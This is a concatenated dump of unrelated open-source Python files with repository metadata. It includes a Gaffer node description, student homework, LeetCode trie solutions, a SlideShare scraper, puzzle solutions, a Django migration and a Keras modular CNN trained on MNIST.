refs/heads/master
| 2021-01-02T09:11:13.137347 | 2017-08-04T05:07:31 | 2017-08-04T05:07:31 | 99,158,553 | 0 | 0 | null | 2017-08-02T20:34:13 | 2017-08-02T20:34:13 | null |
UTF-8
|
Python
| false | false | 3,233 |
py
|
##########################################################################
#
# Copyright (c) 2017, Image Engine Design Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with
# the distribution.
#
# * Neither the name of John Haddon nor the names of
# any other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
import Gaffer
import GafferScene
Gaffer.Metadata.registerNode(
GafferScene.CollectScenes,
"description",
"""
Builds a scene by bundling multiple input scenes together, each
under their own root location. Instead of using an array of inputs
like the Group node, a single input is used instead, and a context
variable is provided so that a different hierarchy can be generated
under each root location. This is especially powerful for building
dynamic scenes where the number of inputs is not known prior to
building the node graph.
Since merging globals from multiple scenes often doesn't make sense,
the output globals are taken directly from the scene corresponding to
`rootNames[0]`.
""",
plugs = {
"rootNames" : [
"description",
"""
The names of the locations to create at the root of
the output scene. The input scene is copied underneath
each of these root locations.
Often the rootNames will be driven by an expression that generates
a dynamic number of root locations, perhaps by querying an asset
management system or listing cache files on disk.
""",
],
"rootNameVariable" : [
"description",
"""
The name of a context variable that is set to the current
root name when evaluating the input scene. This can be used
in upstream expressions and string substitutions to generate
a different hierarchy under each root location.
""",
],
}
)
|
[
"[email protected]"
] | |
f2dbfe14a65b0edc19d892ddcc7a57467691b220
|
f87f51ec4d9353bc3836e22ac4a944951f9c45c0
|
/.history/HW01_20210624144937.py
|
b9d45c1f373833420f3987ed361ba22bbc6b3abd
|
[] |
no_license
|
sanjayMamidipaka/cs1301
|
deaffee3847519eb85030d1bd82ae11e734bc1b7
|
9ddb66596497382d807673eba96853a17884d67b
|
refs/heads/main
| 2023-06-25T04:52:28.153535 | 2021-07-26T16:42:44 | 2021-07-26T16:42:44 | 389,703,530 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,177 |
py
|
"""
Georgia Institute of Technology - CS1301
HW01 - Functions and Expressions
Collaboration Statement:
"""
#########################################
"""
Function Name: bake()
Parameters: cakes (int), cupcakes (int), cookies (int)
Returns: None
"""
def bake(cakes, cupcakes, cookies):
    """Print the total baking time, in hours and minutes, for the order."""
    # Per-item durations in minutes: cake 100, cupcake 70, cookie 45.
    total_minutes = cakes * 100 + cupcakes * 70 + cookies * 45
    hours, minutes = divmod(total_minutes, 60)
    print('It will take {} hours and {} minutes to make {} cakes, {} cupcakes, and {} cookies.'.format(hours, minutes, cakes, cupcakes, cookies))
#########################################
"""
Function Name: cakeVolume()
Parameters: radius (int), height (int)
Returns: None
"""
def cakeVolume(radius, height):
    """Print the cylinder volume of a cake (pi approximated as 3.14), rounded to 2 dp."""
    vol = round(3.14 * radius ** 2 * height, 2)
    print('The volume of the cake is {}.'.format(vol))
#########################################
"""
Function Name: celebrate()
Parameters: pizzas (int), pastas (int), burgers (int), tipPercent (int)
Returns: None
"""
def celebrate(pizzas, pastas, burgers, tipPercent):
    # Menu prices: pizza $14, pasta $10, burger $7.
    pizzas_price = pizzas*14
    pastas_price = pastas*10
    burgers_price = burgers*7
    total_price = pizzas_price + pastas_price + burgers_price
    tip = total_price * (tipPercent/100)
    # NOTE(review): implementation looks unfinished — total_price and tip are
    # computed but never used, and this prints only an empty line.  (File is
    # an in-progress editor autosave.)
    print()
#########################################
"""
Function Name: bookstore()
Parameters: daysBorrowed (int)
Returns: None
"""
def bookstore(daysBorrowed):
    # TODO: not yet implemented — stub from an in-progress homework autosave.
    pass
#########################################
"""
Function Name: monthlyAllowance()
Parameters: allowance (int), savingsPercentage (int)
Returns: None
"""
def monthlyAllowance(allowance, savingsPercentage):
    # TODO: not yet implemented — stub from an in-progress homework autosave.
    pass
bake(1, 3, 12)
cakeVolume(5, 8)
|
[
"[email protected]"
] | |
19e5b00f91bf0b3b5006b61638f0eaf93703a415
|
cbfb679bd068a1153ed855f0db1a8b9e0d4bfd98
|
/leet/facebook/strings_arrays/implement_trie(prefix_tree).py
|
d2417b0002dda188bd8067925406649cf3692fca
|
[] |
no_license
|
arsamigullin/problem_solving_python
|
47715858a394ba9298e04c11f2fe7f5ec0ee443a
|
59f70dc4466e15df591ba285317e4a1fe808ed60
|
refs/heads/master
| 2023-03-04T01:13:51.280001 | 2023-02-27T18:20:56 | 2023-02-27T18:20:56 | 212,953,851 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,538 |
py
|
# this solution is slow but looks right
# we declared TrieNode. It store list of TrieNodes inside of length 26
class TrieNode:
    """Fixed-fanout trie node covering the lowercase ASCII letters 'a'..'z'."""

    def __init__(self):
        # One child slot per letter; `end` marks the end of a stored word.
        self.links = [None] * 26
        self.end = False

    @staticmethod
    def _slot(char):
        # Map 'a'..'z' to indices 0..25.
        return ord(char) - ord('a')

    def get(self, char):
        """Return the child node for *char* (None if absent)."""
        return self.links[self._slot(char)]

    def contains(self, char):
        """Return True if a child exists for *char*."""
        return self.links[self._slot(char)] is not None

    def put(self, char, node):
        """Attach *node* as the child for *char*."""
        self.links[self._slot(char)] = node

    def is_end(self):
        """Return True if a word terminates at this node."""
        return self.end

    def set_end(self):
        """Mark this node as the end of a word."""
        self.end = True
class Trie:
    """Prefix tree over lowercase ASCII words, built from TrieNode links."""
    def __init__(self):
        """
        Initialize your data structure here.
        """
        self.root = TrieNode()
    def insert(self, word: str) -> None:
        """
        Inserts a word into the trie.
        """
        node = self.root
        for ch in word:
            # Create the child link on demand, then descend into it.
            if not node.contains(ch):
                node.put(ch, TrieNode())
            node = node.get(ch)
        # Mark the final node so search() can tell whole words from prefixes.
        node.set_end()
    def __search_prefix(self, word):
        # Walk the trie along `word`; return the final node, or None if the
        # walk falls off the tree.  (Name-mangled private helper.)
        node = self.root
        for ch in word:
            if node.contains(ch):
                node = node.get(ch)
            else:
                return None
        return node
    def search(self, word: str) -> bool:
        """
        Returns if the word is in the trie (as a complete word, not a prefix).
        """
        node = self.__search_prefix(word)
        return node is not None and node.is_end()
    def startsWith(self, prefix: str) -> bool:
        """
        Returns if there is any word in the trie that starts with the given prefix.
        """
        node = self.__search_prefix(prefix)
        return node is not None
# Your Trie object will be instantiated and called as such:
# obj = Trie()
# obj.insert(word)
# param_2 = obj.search(word)
# param_3 = obj.startsWith(prefix)
# this solution is much faster but underneath it uses dict
class TrieDict:
    """Trie backed by nested dicts (faster than the array-of-26 TrieNode version)."""

    def __init__(self):
        # Each node is a dict mapping a character to its child node.
        self.root = dict()

    def insert(self, word: str) -> None:
        """Insert *word* into the trie."""
        node = self.root
        for c in word:
            if c not in node:
                node[c] = dict()
            node = node[c]
        # The '#' placeholder marks the end of a complete word.  E.g. after
        # inserting "abcc" and "abccd" the trie is
        #   {'a': {'b': {'c': {'c': {'#': '#', 'd': {'#': '#'}}}}}}
        # search() looks for '#' to distinguish whole words from prefixes.
        node['#'] = '#'
        # Bug fix: removed a leftover `print(self.root)` debug statement that
        # dumped the entire trie to stdout on every insert.

    def search(self, word: str) -> bool:
        """Return True iff *word* was inserted as a complete word."""
        node = self.root
        for c in word:
            if c not in node:
                return False
            node = node[c]
        return '#' in node

    def startsWith(self, prefix: str) -> bool:
        """Return True iff some inserted word starts with *prefix*."""
        node = self.root
        for c in prefix:
            if c not in node:
                return False
            node = node[c]
        return True
if __name__ == "__main__":
s = TrieDict()
s.insert("abcc")
s.insert("abccd")
|
[
"[email protected]"
] | |
37c1b77dd3586311b40f194e2b54e9d3196a58e6
|
f874b3bffdf98ea52a12f9cd08566557e33d4c98
|
/extract_info.py
|
661aedd6a01faa476fa02e92316332480fa98e79
|
[
"Apache-2.0"
] |
permissive
|
lmorillas/recursoscaa
|
8e567246f722a38a7fb61dd6a884fd0d153cd338
|
bac2ff39d67028ca8d4969d23f5061f09be59a0e
|
refs/heads/master
| 2018-12-28T00:24:31.042017 | 2015-08-29T08:13:23 | 2015-08-29T08:13:23 | 32,229,559 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,684 |
py
|
from amara.bindery import html
from amara.lib import U
from urlparse import urljoin
doc = html.parse('http://es.slideshare.net/JosManuelMarcos/presentations')
doc2 = html.parse('http://es.slideshare.net/JosManuelMarcos/presentations/2')
links = []
datos = []
def extract_links(doc):
return doc.xml_select('//ul[@class="thumbnailFollowGrid"]/li//a')
links.extend(extract_links(doc))
links.extend(extract_links(doc2))
print len(links), 'recursos a extraer ...'
def encode_data(d):
    """UTF-8-encode every value of *d* in place and return the same dict."""
    for key, value in list(d.items()):
        d[key] = value.encode('utf-8')
    return d
def extract_data(link):
    # Scrape one SlideShare presentation page into a metadata dict
    # (url, id, autor, label, fecha, desc, imagen).  Python 2 code
    # (bare `print` statement); parsing is done with amara's html/U helpers.
    item = {}
    _link = urljoin('http://es.slideshare.net/', U(link.href))
    _doc = html.parse(_link)
    # NOTE(review): this tests the module-level `doc` (the listing page parsed
    # at import time), which is always truthy here — presumably `_doc` was
    # intended.  Confirm before changing.
    if doc:
        print _link
        item['url'] = _link
        item['id'] = _link.split('/')[-1]
        item['autor'] = []
        _label = U(_doc.xml_select('//h1[contains(@class, "slideshow-title-text")]')).strip()
        # Titles mentioning "Romero" get an extra hard-coded co-author.
        if u'Romero' in _label:
            item['autor'].append('David Romero')
        item['autor'].append(U(_doc.xml_select('//a[@class="j-author-name"]')).strip())
        item['label'] = _label.split('-')[0].strip()
        item['fecha'] = U(_doc.xml_select('//time[@itemprop="datePublished"]')).strip()
        # Prefer the expanded description; fall back to the collapsed one.
        _desc = U(_doc.xml_select('//p[contains(@class, "j-desc-expand")]')).strip()
        if _desc:
            item['desc'] = _desc
        else:
            item['desc'] = U(_doc.xml_select('//div[contains(@class, "j-desc-more")]')).strip()
        item['imagen'] = _doc.xml_select(u'//img[contains(@class, "slide_image")]')[0].src
    return item
datos = [extract_data(l) for l in links]
import json
json.dump({'items': datos}, open('datos.json', 'w'))
'''
d2 = html.parse(urljoin('http://es.slideshare.net/', l)
print d2.xml_encode()
d2.xml_select('//time')
map(d2.xml_select('//time'), lambda x: print x)
map( lambda x: print x, d2.xml_select('//time'))
lambda x: print x
__version__
version
_version_
print d2.xml_select('//time')[0]
print d2.xml_select('//time')[1]
print d2.xml_select('//time[@itemprop="datePublished"]')
print d2.xml_select('//time[@itemprop="datePublished"]')[0]
print d2.xml_select('//time[@itemprop="datePublished"]')[0]
print d2.xml_select('//a[@class="j-author-name"]/text()')
print d2.xml_select('//a[@class="j-author-name"]')
print d2.xml_select('//a[@class="j-author-name"]')
from amara.lib import U
print U(d2.xml_select('//a[@class="j-author-name"]')).strip()
print U(d2.xml_select('//div[contains(@class, "j-desc-more")]')).strip()
print U(d2.xml_select('//a[contains(@class, "j-download")]')).strip()
history
'''
|
[
"[email protected]"
] | |
d7043a83bf47e5a0fc3d1216e5b5cab408f81ede
|
11a246743073e9d2cb550f9144f59b95afebf195
|
/advent/2017/day8.py
|
6b9e3586e8658bcf41dbd5263b00183231315b58
|
[] |
no_license
|
ankitpriyarup/online-judge
|
b5b779c26439369cedc05c045af5511cbc3c980f
|
8a00ec141142c129bfa13a68dbf704091eae9588
|
refs/heads/master
| 2020-09-05T02:46:56.377213 | 2019-10-27T20:12:25 | 2019-10-27T20:12:25 | 219,959,932 | 0 | 1 | null | 2019-11-06T09:30:58 | 2019-11-06T09:30:57 | null |
UTF-8
|
Python
| false | false | 574 |
py
|
from collections import *
import itertools
import random
import sys
def main():
d = defaultdict(int)
ans = -19
for line in sys.stdin:
words = line.strip().split()
d_reg = words[0]
sgn = 1 if words[1] == 'inc' else -1
amt = int(words[2])
reg = words[4]
e = words[5]
amt2 = int(words[6])
val = d[reg]
if eval(str(val) + ' ' + e + ' ' + str(amt2)):
d[d_reg] += sgn * amt
# ans = max(ans, (max(v for k, v in d.items())))
print(max(v for k, v in d.items()))
main()
|
[
"[email protected]"
] | |
d1e1ea3ca62fa8c7eee1ea56bcf21143db9db802
|
ca7aa979e7059467e158830b76673f5b77a0f5a3
|
/Python_codes/p03962/s618919847.py
|
7c3073e9045ef040a154ec5d8acb94554d03edf5
|
[] |
no_license
|
Aasthaengg/IBMdataset
|
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
|
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
|
refs/heads/main
| 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 514 |
py
|
import sys
import math
from functools import reduce
import bisect
def getN():
    """Read one line and return it as a single int."""
    raw = input()
    return int(raw)
def getNM():
    """Read one whitespace-separated line and map every token to int."""
    tokens = input().split()
    return map(int, tokens)
def getList():
    """Read one line and return its tokens as a list of ints."""
    return [int(tok) for tok in input().split()]
def input():
    """Faster stand-in for the builtin input(): read one raw line from
    stdin and strip any trailing whitespace (including the newline)."""
    line = sys.stdin.readline()
    return line.rstrip()
# input = sys.stdin.buffer.readline
def index(a, x):
    # Binary-search the sorted list *a* for an element exactly equal to *x*;
    # return its leftmost index, or False when absent.
    # NOTE(review): a hit at position 0 is indistinguishable from a miss under
    # truth-testing (0 == False) — callers must compare with `is False`, not
    # rely on truthiness.
    i = bisect.bisect_left(a, x)
    if i != len(a) and a[i] == x:
        return i
    return False
#############
# MAIN CODE #
#############
# Read three integers from the single input line and print how many
# distinct values appear among them (1, 2 or 3).
a, b, c = getNM()
print(len({a, b, c}))
|
[
"[email protected]"
] | |
92275752bbea081287f13884cac8c5b556fa1fd2
|
5c58587ebfbf56192b3dc6ed6f43bc002c8e2cff
|
/payments/migrations/0026_auto_20180906_1023.py
|
bb3127132c77be7ffde946ce16ac96b8870c7008
|
[] |
no_license
|
hossamelneily/nexchange
|
fb9a812cfc72ac00b90cf64d6669a8129c2d2d4b
|
6d69274cd3808989abe2f5276feb772d1f0fa8b4
|
refs/heads/release
| 2022-12-13T09:20:47.297943 | 2019-02-12T08:20:34 | 2019-02-12T08:20:34 | 210,064,740 | 1 | 2 | null | 2022-12-09T00:54:01 | 2019-09-21T23:19:34 |
Python
|
UTF-8
|
Python
| false | false | 4,388 |
py
|
# Generated by Django 2.0.7 on 2018-09-06 10:23
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    # Introduces card-BIN metadata: Bank, BankBin, CardCompany, CardLevel and
    # CardType tables, plus foreign keys wiring BankBin to its lookup tables
    # and PaymentPreference to BankBin. All models share created_on /
    # modified_on audit columns.

    dependencies = [
        ('core', '0066_remove_transactionprice_type'),
        ('payments', '0025_auto_20180822_1537'),
    ]

    operations = [
        migrations.CreateModel(
            name='Bank',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('created_on', models.DateTimeField(auto_now_add=True)),
                ('modified_on', models.DateTimeField(auto_now=True)),
                ('name', models.CharField(blank=True, max_length=255, null=True)),
                ('website', models.URLField(blank=True, null=True)),
                ('phone', models.CharField(blank=True, max_length=50, null=True)),
                ('country', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.DO_NOTHING, to='core.Country')),
            ],
            options={
                'abstract': False,
            },
        ),
        migrations.CreateModel(
            name='BankBin',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('created_on', models.DateTimeField(auto_now_add=True)),
                ('modified_on', models.DateTimeField(auto_now=True)),
                # Card BIN (issuer identification number); unique per bank record.
                ('bin', models.CharField(default=None, max_length=15, unique=True)),
                ('checked_external', models.BooleanField(default=False)),
                ('bank', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.DO_NOTHING, to='payments.Bank')),
            ],
            options={
                'abstract': False,
            },
        ),
        migrations.CreateModel(
            name='CardCompany',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('created_on', models.DateTimeField(auto_now_add=True)),
                ('modified_on', models.DateTimeField(auto_now=True)),
                ('name', models.CharField(blank=True, max_length=255, null=True)),
            ],
            options={
                'abstract': False,
            },
        ),
        migrations.CreateModel(
            name='CardLevel',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('created_on', models.DateTimeField(auto_now_add=True)),
                ('modified_on', models.DateTimeField(auto_now=True)),
                ('name', models.CharField(blank=True, max_length=255, null=True)),
            ],
            options={
                'abstract': False,
            },
        ),
        migrations.CreateModel(
            name='CardType',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('created_on', models.DateTimeField(auto_now_add=True)),
                ('modified_on', models.DateTimeField(auto_now=True)),
                ('name', models.CharField(blank=True, max_length=255, null=True)),
            ],
            options={
                'abstract': False,
            },
        ),
        # Lookup FKs on BankBin, added after the table exists.
        migrations.AddField(
            model_name='bankbin',
            name='card_company',
            field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.DO_NOTHING, to='payments.CardCompany'),
        ),
        migrations.AddField(
            model_name='bankbin',
            name='card_level',
            field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.DO_NOTHING, to='payments.CardLevel'),
        ),
        migrations.AddField(
            model_name='bankbin',
            name='card_type',
            field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.DO_NOTHING, to='payments.CardType'),
        ),
        # Link each payment preference to the BIN it was detected from.
        migrations.AddField(
            model_name='paymentpreference',
            name='bank_bin',
            field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.DO_NOTHING, to='payments.BankBin'),
        ),
    ]
|
[
"[email protected]"
] | |
7b10bae824de4ead5ffbb387b689114066ec431d
|
5d304c6ec0f01edee73e3b612f84307060c0da54
|
/letter_combinations_of_a_phone_number.py
|
089f3c0c2377b7e620e80a61fbd5b12517d716e8
|
[] |
no_license
|
xartisan/leetcode-solutions-in-python
|
cfa06b9e02f7ec0446cf6b71df4ea46caa359adc
|
7e3929a4b5bd0344f93373979c9d1acc4ae192a7
|
refs/heads/master
| 2020-03-14T17:10:07.957089 | 2018-07-29T10:11:01 | 2018-07-29T10:11:01 | 131,713,447 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 499 |
py
|
class Solution:
    def letterCombinations(self, digits):
        """
        Return every letter string the phone-keypad digits can spell.

        :type digits: str
        :rtype: List[str]
        """
        # Keypad mapping: digit -> letters ('0' and '1' carry no letters).
        keypad = ["", "", "abc", "def", "ghi", "jkl", "mno", "pqrs", "tuv", "wxyz"]
        combos = []
        for digit in digits:
            letters = keypad[int(digit)]
            if combos:
                # Extend every existing prefix with each letter of this key
                # (letter-major order, matching the accumulation order).
                combos = [prefix + letter for letter in letters for prefix in combos]
            else:
                combos = list(letters)
        return combos
|
[
"[email protected]"
] | |
d3f0f22a9f875992c367e7fce63ee8366b08f220
|
5254c3a7e94666264120f26c87734ad053c54541
|
/Revision de Pares/Semana N°5/Caso 2/05-0-gin-fileparse.py-vir-2020-09-08_19.44.49.py
|
c1df151428fe518671cc730320bf9ea5a29de07f
|
[] |
no_license
|
ccollado7/UNSAM---Python
|
425eb29a2df8777e9f892b08cc250bce9b2b0b8c
|
f2d0e7b3f64efa8d03f9aa4707c90e992683672d
|
refs/heads/master
| 2023-03-21T17:42:27.210599 | 2021-03-09T13:06:45 | 2021-03-09T13:06:45 | 286,613,172 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,352 |
py
|
#fileparse.py
import csv
def parse_csv(nombre_archivo, select = None, types = None, has_headers=True):
    '''
    Parsea un archivo CSV en una lista de registros.

    Parámetros:
      nombre_archivo: ruta del archivo CSV a leer.
      select: lista opcional de nombres de columnas a conservar
              (requiere has_headers=True).
      types: lista opcional de funciones de conversión, una por columna
              del registro resultante.
      has_headers: si es True, la primera fila son los encabezados y cada
              registro es un diccionario; si es False, cada registro es
              una tupla.

    Lanza RuntimeError si se pasa select sin encabezados (antes se
    ignoraba en silencio).
    '''
    if select and not has_headers:
        raise RuntimeError('Para seleccionar columnas se requieren encabezados')

    # `with` garantiza que el archivo se cierre (antes quedaba abierto).
    with open(nombre_archivo) as f:
        filas = csv.reader(f)
        registros = []
        if has_headers:
            encabezados = next(filas)
            if select:
                # Índices de las columnas pedidas, en el orden pedido.
                indices = [encabezados.index(nombre_columna) for nombre_columna in select]
                encabezados = select
            else:
                indices = []
            for fila in filas:
                if not fila:  # Saltear filas vacías
                    continue
                if indices:
                    fila = [fila[index] for index in indices]
                # BUG FIX: antes `types` sólo se aplicaba junto con `select`;
                # ahora se aplica siempre que se indique.
                if types:
                    fila = [tipo(elem) for tipo, elem in zip(types, fila)]
                registros.append(dict(zip(encabezados, fila)))
        else:
            for fila in filas:
                if not fila:  # Saltear filas vacías
                    continue
                if types:
                    fila = [tipo(elem) for tipo, elem in zip(types, fila)]
                registros.append(tuple(fila))
    return registros
#%%
# Manual checks: parse the same camion.csv with different conversion lists
# (notebook-style cells separated by #%%).
camion_1 = parse_csv('camion.csv', types=[str, int, float])
print(camion_1)
#%%
camion_2 = parse_csv('camion.csv', types=[str, str, str])
print(camion_2)
#%%
camion_3 = parse_csv('camion.csv', select = ['nombre', 'cajones'], types=[str, int])
print(camion_3)
#%%
camion_4 = parse_csv('camion.csv', types=[str, str, float])
print(camion_4)
#%%
camion_5 = parse_csv('camion.csv', types=[str, int, str])
print(camion_5)
|
[
"[email protected]"
] | |
77646e2ec0616be8c2082741e2ca6efa9902dd3a
|
ef457162d79be971f52ee96b1891764a2d230e8b
|
/demo.py
|
0b61466993849c1bffa5dd4056ad7be10ebc7073
|
[] |
no_license
|
LuoJiaji/modularCNN
|
f2239f6b4ed378fede4401f6e90d9b1d5acc8c70
|
b8591c3924abeccaebfad56289a185f904da8608
|
refs/heads/master
| 2020-06-18T12:57:59.192061 | 2019-07-11T13:20:08 | 2019-07-11T13:20:08 | 196,309,757 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 5,242 |
py
|
import random
import numpy as np
import matplotlib.pyplot as plt
from keras.datasets import mnist
from keras.preprocessing import image
from keras.models import Model, load_model
from keras.layers import Input, Flatten, Dense, Dropout, Lambda
from keras.layers.convolutional import Conv2D
from keras.layers.pooling import MaxPooling2D
from keras.optimizers import RMSprop, SGD
from keras.utils.vis_utils import plot_model
# Load MNIST and scale pixel values to [0, 1].
(x_train, y_train), (x_test, y_test) = mnist.load_data()
x_train = x_train.astype('float32')
x_test = x_test.astype('float32')
x_train /= 255
x_test /= 255
# Add the trailing channel axis: (N, 28, 28) -> (N, 28, 28, 1).
# NOTE(review): only x_test is expanded here; x_train batches get the
# channel axis inside the training loop below.
x_test = np.expand_dims(x_test, axis = 3)
def get_random_batch(x, y, l, batchsize):
    """Sample a class-balanced batch for one-vs-rest label *l*.

    Args:
        x: samples, indexable along axis 0.
        y: labels aligned with x (numpy array).
        l: the "positive" label.
        batchsize: number of samples to return (positives and negatives
            alternate, so half of each).

    Returns:
        (x_batch, y_batch): numpy arrays; y_batch is float32 with 1.0 at
        even positions (label == l) and 0.0 at odd positions.
    """
    # BUG FIX: the original indexed the module-global y_train instead of the
    # y argument, so the parameter was silently ignored.
    ind_p = np.where(y == l)[0]
    ind_n = np.where(y != l)[0]
    x_batch = []
    y_batch = []
    l_p = len(ind_p)
    l_n = len(ind_n)
    for _ in range(int(batchsize / 2)):
        # One positive example...
        ind = random.randrange(l_p)
        x_batch.append(x[ind_p[ind]])
        y_batch.append(1)
        # ...followed by one negative example.
        ind = random.randrange(l_n)
        x_batch.append(x[ind_n[ind]])
        y_batch.append(0)
    x_batch = np.array(x_batch)
    y_batch = np.array(y_batch).astype('float32')
    return x_batch, y_batch
x_batch, y_batch = get_random_batch(x_train, y_train, 0, 128)
# Prototype of the per-digit binary CNN: two conv/pool stages, then a dense
# head with a single sigmoid output (positive = "is this digit").
# NOTE(review): this instance is superseded — the training loop below
# rebuilds an identical model for each digit.
input_shape = (28,28,1)
input_data = Input(shape=input_shape)
x = Conv2D(32, (3, 3), activation='relu', padding='same', name='block1_conv1')(input_data)
x = MaxPooling2D((2, 2), strides=(2, 2), name='block1_pool')(x)
x = Conv2D(32, (3, 3), activation='relu', padding='same', name='block1_conv2')(x)
x = MaxPooling2D((2, 2), strides=(2, 2), name='block2_pool')(x)
x = Flatten(name='flatten')(x)
x = Dense(128, activation='relu', name='fc1')(x)
x = Dense(1, activation='sigmoid', name='fc2')(x)
model = Model(input_data, x)
#model.compile(optimizer='rmsprop', loss='mse', metrics=['accuracy'])
model.compile(optimizer='rmsprop', loss='binary_crossentropy', metrics=['accuracy'])
#i=3
# Train one binary (one-vs-rest) CNN per digit 0-9 and save each to disk.
for i in range(10):
    # Fresh model per digit — same architecture as the prototype above.
    input_shape = (28,28,1)
    input_data = Input(shape=input_shape)
    x = Conv2D(32, (3, 3), activation='relu', padding='same', name='block1_conv1')(input_data)
    x = MaxPooling2D((2, 2), strides=(2, 2), name='block1_pool')(x)
    x = Conv2D(32, (3, 3), activation='relu', padding='same', name='block1_conv2')(x)
    x = MaxPooling2D((2, 2), strides=(2, 2), name='block2_pool')(x)
    x = Flatten(name='flatten')(x)
    x = Dense(128, activation='relu', name='fc1')(x)
    x = Dense(1, activation='sigmoid', name='fc2')(x)
    model = Model(input_data, x)
    model.compile(optimizer='rmsprop', loss='binary_crossentropy', metrics=['accuracy'])
    # 5000 balanced mini-batches of 256 samples each.
    for it in range(5000):
        x_batch, y_batch = get_random_batch(x_train, y_train, i, 256)
        # Add the channel axis the conv layers expect.
        x_batch = np.expand_dims(x_batch, axis = 3)
        train_loss, train_acc = model.train_on_batch(x_batch, y_batch)
        if it % 100 == 0:
            print('i:', i, 'it:', it, 'loss', train_loss, 'acc', train_acc)
    model.save('./models/ModularCNN_' + str(i) + '.h5')
# 单个模型测试
i=9
model = load_model('./models/ModularCNN_9.h5')
test_label = np.copy(y_test)
test_label[np.where(y_test == i)] = 1
test_label[np.where(y_test != i)] = 0
#x_test = np.expand_dims(x_test, axis = 3)
pre = model.predict(x_test)
pre = pre[:,0]
pre[np.where(pre < 0.2)] = 0
pre[np.where(pre >= 0.2)] = 1
acc = np.mean(pre == test_label)
# 整合模型,综合测试
input_shape = (28,28,1)
input_data = Input(shape=input_shape)
model_0 = load_model('./models/ModularCNN_0.h5')
model_1 = load_model('./models/ModularCNN_1.h5')
model_2 = load_model('./models/ModularCNN_2.h5')
model_3 = load_model('./models/ModularCNN_3.h5')
model_4 = load_model('./models/ModularCNN_4.h5')
model_5 = load_model('./models/ModularCNN_5.h5')
model_6 = load_model('./models/ModularCNN_6.h5')
model_7 = load_model('./models/ModularCNN_7.h5')
model_8 = load_model('./models/ModularCNN_8.h5')
model_9 = load_model('./models/ModularCNN_9.h5')
output_0 = model_0(input_data)
output_1 = model_1(input_data)
output_2 = model_2(input_data)
output_3 = model_3(input_data)
output_4 = model_4(input_data)
output_5 = model_5(input_data)
output_6 = model_6(input_data)
output_7 = model_7(input_data)
output_8 = model_8(input_data)
output_9 = model_9(input_data)
model = Model(inputs = input_data,
outputs=[output_0, output_1, output_2, output_3, output_4,
output_5, output_6, output_7, output_8, output_9])
#plot_model(model, to_file='./models_visualization/modularCNN.pdf',show_shapes=True)
#plot_model(model, to_file='./models_visualization/modularCNN.png',show_shapes=True)
pre = model.predict(x_test)
pre = np.array(pre)
pre = np.squeeze(pre)
pre = pre.T
pre = np.argmax(pre, axis = 1)
acc = np.mean(pre == y_test)
## 未知数据测试
img = image.load_img('./dataset/img/G/Q2Fsdmlub0hhbmQudHRm.png', target_size=(28, 28))
img = image.img_to_array(img)
img = img/255
img = img[:,:,0]
plt.imshow(img)
img = np.expand_dims(img, axis=0)
img = np.expand_dims(img, axis=3)
pre = model.predict(img)
pre = np.array(pre)
pre = np.squeeze(pre)
img_rand = np.random.rand(1,28,28,1)
pre = model.predict(img)
pre = np.array(pre)
pre = np.squeeze(pre)
|
[
"[email protected]"
] | |
613558e1f0a6f4199d62e2feae12a2ba06b09eba
|
66e45a2760db8a1fc580689586806c2e3cce0517
|
/pymontecarlo/options/model/base.py
|
8951f563fdc581a862298aeec9784c0e6a2631d2
|
[] |
no_license
|
arooney/pymontecarlo
|
4b5b65c88737de6fac867135bc05a175c8114e48
|
d2abbb3e9d3bb903ffec6dd56472470e15928b46
|
refs/heads/master
